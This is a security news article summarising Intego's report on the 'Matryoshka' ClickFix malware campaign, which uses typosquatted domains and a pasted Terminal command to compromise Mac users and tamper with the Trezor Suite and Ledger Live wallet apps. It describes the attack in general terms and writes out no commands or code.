“Matryoshka” Malware: New macOS Attack Hides Inside “Russian Dolls” of Obfuscation
Ddos 
Mac users are being targeted by a sophisticated new social engineering campaign that wraps malicious code in layers of deceit, much like the famous Russian nesting dolls it’s named after. Intego Antivirus Labs has uncovered “Matryoshka,” a new variant of the “ClickFix” scam that tricks users into infecting their own machines under the guise of fixing a technical problem.
The campaign specifically targets cryptocurrency users, attempting to surgically alter trusted wallet applications to steal funds.
The attack begins with a simple mistake: a typo. Attackers have registered domains that look nearly identical to legitimate software review sites. For example, a user trying to visit comparisons.org might accidentally type comparisions.org.
This small error triggers a tripwire. “The site immediately forwards the visitor through a Traffic Distribution System (TDS),” the report explains.
Instead of the site they expected, the user is presented with a fake error message and a helpful “fix.” “The user is presented with instructions to copy a ‘fix’ command and paste it into the macOS Terminal,” Intego researchers note.
What sets Matryoshka apart is how hard it tries to hide. Unlike simple scripts, this malware uses “nested obfuscation layers” to evade detection by security software.
The payload includes an “in-memory, compressed wrapper and API-gated network communications designed to hinder static analysis and automated sandboxes”. This means the malware doesn’t just run; it unpacks itself in memory, making it difficult for antivirus tools to scan the file on the disk.
Once the victim pastes the command, the malware goes to work. It doesn’t just steal files; it modifies them. The attack targets hardware wallet apps like Ledger Live and Trezor Suite.
- Trezor Suite: The malware takes a brute-force approach. “If Trezor Suite is found, the script attempts to terminate the process, remove the application, and download a malicious replacement”.
- Ledger Live: The tactic here is more subtle. “The payload attempts to replace an Electron archive (app.asar) and related metadata within the legitimate application bundle,” essentially surgically patching the app to include a backdoor while keeping the rest of the software intact.
After harvesting browser data and compromising wallets, it displays a fake error message: “Your Mac does not support this application. Try reinstalling or downloading the version for your system”.
This message is designed to “reduce suspicion and can delay investigation,” leaving the victim confused but unaware that their digital assets are already being siphoned off.
Related Posts:
- New ‘Cuckoo’ Mac Malware Mimics Homebrew, Threatens User Data
- Mac Users Rejoice! Microsoft’s Copilot App Lands on the Mac App Store
- Apple Confirmed that All Mac and iOS Devices Are Affected by Chip Vulnerability
- FreeDrain: Silent Crypto Theft on Google? Massive Phishing Network Exposed
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
